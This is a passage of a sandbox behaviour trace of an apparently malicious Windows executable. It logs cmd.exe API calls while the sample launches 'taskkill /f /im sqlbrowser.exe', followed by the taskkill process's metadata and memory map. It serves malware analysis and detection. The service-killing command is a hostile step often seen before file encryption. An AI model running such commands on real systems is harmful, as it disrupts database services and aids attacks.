_wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0147.118] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0147.118] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0147.118] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0147.118] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0147.118] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0147.118] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0147.118] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0147.118] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0147.118] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0147.118] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0147.118] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0147.118] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0147.118] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0147.118] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0147.119] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0147.119] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0147.119] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0147.119] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0147.119] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0147.119] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0147.119] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0147.119] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0147.119] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0147.119] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0147.119] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0147.119] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0147.119] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0147.119] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0147.119] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0147.119] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0147.119] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0147.119] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0147.119] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0147.119] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0147.119] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0147.119] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0147.119] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0147.120] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0147.120] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0147.120] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0147.120] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0147.120] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0147.120] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0147.120] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0147.120] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0147.120] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0147.120] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0147.120] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0147.120] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0147.120] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0147.120] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0147.120] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0147.120] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0147.120] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0147.120] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0147.120] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0147.120] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0147.120] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0147.120] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0147.121] GetProcessHeap () returned 0x470000 [0147.121] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x210) returned 0x47ad20 [0147.121] GetProcessHeap () returned 0x470000 [0147.121] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4a) returned 0x47af38 [0147.121] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0147.122] GetProcessHeap () returned 0x470000 [0147.122] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x418) returned 0x4705c8 [0147.122] SetErrorMode (uMode=0x0) returned 0x8003 [0147.122] SetErrorMode (uMode=0x1) returned 0x0 [0147.122] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4705d0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0147.122] SetErrorMode (uMode=0x8003) returned 0x1 [0147.122] GetProcessHeap () returned 0x470000 [0147.122] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4705c8, Size=0x56) returned 0x4705c8 [0147.122] GetProcessHeap () returned 0x470000 [0147.122] RtlSizeHeap (HeapHandle=0x470000, Flags=0x0, MemoryPointer=0x4705c8) returned 0x56 [0147.122] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0147.122] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0147.122] GetProcessHeap () returned 0x470000 [0147.123] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x110) returned 0x47af90 [0147.123] GetProcessHeap () returned 0x470000 [0147.123] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x218) returned 0x470628 [0147.129] GetProcessHeap () returned 0x470000 [0147.129] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x470628, Size=0x112) returned 0x470628 [0147.129] GetProcessHeap () returned 0x470000 [0147.129] RtlSizeHeap (HeapHandle=0x470000, Flags=0x0, MemoryPointer=0x470628) returned 0x112 [0147.129] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0147.129] GetProcessHeap () returned 0x470000 [0147.129] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xe0) returned 0x47b0a8 [0147.131] GetProcessHeap () returned 0x470000 [0147.131] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x47b0a8, Size=0x76) returned 0x47b0a8 [0147.131] GetProcessHeap () returned 0x470000 [0147.132] RtlSizeHeap (HeapHandle=0x470000, Flags=0x0, MemoryPointer=0x47b0a8) returned 0x76 [0147.132] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0147.132] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0147.133] GetLastError () returned 0x2 [0147.133] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0147.133] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x47b128 [0147.133] GetProcessHeap () returned 0x470000 [0147.133] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x14) returned 0x477590 [0147.133] FindClose (in: hFindFile=0x47b128 | out: hFindFile=0x47b128) returned 1 [0147.133] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0147.133] GetLastError () returned 0x2 [0147.134] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x47b128 [0147.134] GetProcessHeap () returned 0x470000 [0147.134] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x477590, Size=0x4) returned 0x47b168 [0147.134] FindClose (in: hFindFile=0x47b128 | out: hFindFile=0x47b128) returned 1 [0147.134] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0147.134] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0147.134] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0147.136] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0147.136] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0147.136] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x140, hStdOutput=0x144, hStdError=0x154)) [0147.137] GetProcessHeap () returned 0x470000 [0147.137] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x18) returned 0x477550 [0147.137] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0147.137] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0147.137] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0147.137] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0147.137] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0147.137] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0147.137] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0147.137] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0147.137] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0147.137] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0147.137] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0147.137] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0147.137] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0147.137] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0147.137] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0147.137] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0147.137] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0147.137] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0147.137] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0147.138] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0147.138] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0147.138] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0147.138] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0147.138] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0147.138] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0147.138] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0147.138] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0147.138] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0147.138] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0147.138] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0147.138] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0147.138] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0147.138] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0147.138] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0147.138] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0147.138] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0147.138] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0147.138] GetProcessHeap () returned 0x470000 [0147.138] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x477550) returned 1 [0147.138] GetProcessHeap () returned 0x470000 [0147.138] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xa) returned 0x47b128 [0147.138] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0147.142] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im sqlbrowser.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im sqlbrowser.exe ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="taskkill /f /im sqlbrowser.exe ", lpProcessInformation=0x19f6fc*(hProcess=0x9c, hThread=0x98, dwProcessId=0x6dc, dwThreadId=0x6f8)) returned 1 [0147.172] CloseHandle (hObject=0x98) returned 1 [0147.172] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0147.172] GetProcessHeap () returned 0x470000 [0147.172] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x479d58) returned 1 [0147.172] GetEnvironmentStringsW () returned 0x479d58* [0147.173] GetProcessHeap () returned 0x470000 [0147.173] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xa76) returned 0x477cc8 [0147.173] FreeEnvironmentStringsA (penv="=") returned 1 [0147.173] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0148.668] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x80) returned 1 [0148.668] CloseHandle (hObject=0x9c) returned 1 [0148.669] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000080") returned 8 [0148.669] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0148.669] GetProcessHeap () returned 0x470000 [0148.670] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x477cc8) returned 1 [0148.670] GetEnvironmentStringsW () returned 0x47b178* [0148.670] GetProcessHeap () returned 0x470000 [0148.670] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xa9c) returned 0x477cc8 [0148.670] FreeEnvironmentStringsA (penv="=") returned 1 [0148.670] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0148.670] GetProcessHeap () returned 0x470000 [0148.670] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x477cc8) returned 1 [0148.671] GetEnvironmentStringsW () returned 0x47b178* [0148.671] GetProcessHeap () returned 0x470000 [0148.671] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xa9c) returned 0x477cc8 [0148.671] FreeEnvironmentStringsA (penv="=") returned 1 [0148.671] GetProcessHeap () returned 0x470000 [0148.671] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x47b128) returned 1 [0148.671] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0148.671] _get_osfhandle (_FileHandle=1) returned 0x144 [0148.671] SetConsoleMode (hConsoleHandle=0x144, dwMode=0x0) returned 0 [0148.671] _get_osfhandle (_FileHandle=1) returned 0x144 [0148.671] GetConsoleMode (in: hConsoleHandle=0x144, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0148.671] _get_osfhandle (_FileHandle=0) returned 0x140 [0148.671] GetConsoleMode (in: hConsoleHandle=0x140, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0148.671] GetConsoleOutputCP () returned 0x1b5 [0148.672] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0148.672] SetThreadUILanguage (LangId=0x0) returned 0x409 [0148.674] exit (_Code=128) Thread: id = 133 os_tid = 0xbfc Process: id = "13" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x4f6ae000" os_pid = "0x6dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "12" os_parent_pid = "0x5e0" cmd_line = "taskkill /f /im sqlbrowser.exe " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1423 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1424 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1425 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1426 start_va = 0x50000 end_va = 0x65fff monitored = 0 entry_point = 0x5de80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 1427 start_va = 0x70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 1428 start_va = 0x4070000 end_va = 0x4084fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 1429 start_va = 0x4090000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 1430 start_va = 0x40d0000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 1431 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 1432 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 1433 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 1434 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1435 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1436 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1437 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1438 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 1439 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1440 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 1441 start_va = 0x4180000 end_va = 0x418ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004180000" filename = "" Region: id = 1442 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1443 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1444 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1445 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1446 start_va = 0x4400000 end_va = 0x46dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 1447 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1448 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1449 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1450 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1451 start_va = 0x4400000 end_va = 0x44bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1452 start_va = 0x45e0000 end_va = 0x46dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045e0000" filename = "" Region: id = 1453 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1454 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1455 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1456 start_va = 0x4130000 end_va = 0x416ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004130000" filename = "" Region: id = 1457 start_va = 0x4190000 end_va = 0x41cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004190000" filename = "" Region: id = 1458 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1459 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1460 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1461 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1462 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1463 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1464 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1465 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1466 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1467 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1468 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1469 start_va = 0x6cda0000 end_va = 0x6cda7fff monitored = 0 entry_point = 0x6cda17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1470 start_va = 0x6ccb0000 end_va = 0x6cceefff monitored = 0 entry_point = 0x6ccc46c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 